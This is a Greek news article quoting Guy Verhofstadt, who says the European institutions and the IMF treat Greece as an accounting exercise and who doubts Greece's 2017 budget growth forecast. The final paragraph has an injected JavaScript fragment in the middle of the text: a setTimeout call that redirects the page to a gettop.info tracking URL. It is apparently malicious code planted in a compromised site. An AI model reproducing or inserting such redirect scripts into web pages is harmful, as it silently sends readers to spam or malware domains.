Φερχόφσταντ: Oι θεσμοί να αλλάξουν πολιτική προς την Ελλάδα

0
6

 

Στο πλαίσιο της συνέντευξης Τύπου στο Ευρωκοινοβούλιο, ο επικεφαλής των Φιλελευθέρων, Γκι Φερχόφσταντ επεσήμανε πως «να σταματήσουν οι ευρωπαϊκοί θεσμοί και το ΔΝΤ να αντιμετωπίζουν την Ελλάδα ως μία λογιστική άσκηση. Η πολιτική τους δεν λειτουργεί».

«Αυτό που εμείς θέλουμε είναι να αυξήσουμε τις πιέσεις στους ευρωπαϊκούς θεσμούς και στην ελληνική κυβέρνηση, αλλά κατεξοχήν στους θεσμούς, για να αλλάξουν την πολιτική προς την Ελλάδα, η οποία δεν λειτουργεί», συμπλήρωσε.

Όπως σημείωσε ο κ. Φερχόφσταντ, «δεν θα υπάρξει ανάπτυξη στην Ελλάδα το 2016. Αυτή είναι η αλήθεια. Ο προϋπολογισμός της Ελλάδας για το 2017 έγινε με βάση μία πρόβλεψη οικονομικής ανάπτυξης 2,7%. Νομίζω ότι πρόκειται για έλλειψη σοβαρότητας, το να βασίζεται ένας προϋπολογισμός σε μία πρόβλεψη οικονομικής ανάπτυξης στην Ελλάδα που να πλησιάζει το 3%. Ελπίζω να είναι αλήθεια, ας μη θεωρηθεί ότι είμαι αγενής, αλλά δεν νομίζω ότι θα είναι η πραγματικότητα. Θα πρέπει, επομένως, οι ευρωπαϊκοί θεσμοί και το ΔΝΤ να σταματήσουν να θεωρούν ότι με τη στρατηγική που εφαρμόζουν σήμερα θα λύσουν το πρόβλημα. Το πρόβλημα θα λυθεί εφόσον υπάρξει αλλαγή της εσωτερικής πολιτικής στην Ελλάδα που υποστηρίζεται από τις πιέσεις που ασκούν οι θεσμοί».

«Οι Ευρωπαίοι θα πρέπει να σταματήσουν να αντιμετωπίζουν την Ελλάδα, σαν να επρόκειτο για μία λογιστική άσκηση. Λογιστική, δηλαδή εάν τα χρήματα μαζεύονται από την αύξηση των φόρων ή εάν τα χρήματα μαζεύονται από τη μείωση των μισθών το ίδιο κάνει, εάν το πρωτογενές πλεόνασμα ή το χρέος είναι αυτά που είναι, δεν πειράζει. Όχι, η πραγματικότητα είναι άλλη. Στην Ελλάδα δεν έχουμε να κάνουμε μία λογιστική πράξη, αλλά μία σε βάθος μεταρρύθμιση της οικονομίας, του πολιτικού συστήματος, κατά της διαφθοράς κ.λπ. Αυτό θα πρέπει να επιδιώξουν οι ευρωπαϊκοί θεσμοί και να σταματήσουν να περιορίζουν την αντιμετώπιση του ελληνικού προβλήματος σε μία λογιστική άσκηση… χωρίς αποτέλεσμα», συμπλήρωσε.

Ο κ. Φερχόσφσταντ δήλωσε ότι η Ομάδα του είναι άκρως αποφασισμένη να εκφράσει δυναμικά τις θέσεις της στην Ευρωπαϊκή Επιτροπή για την αλλαγή της αντιμετώπισης της Ελλάδας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here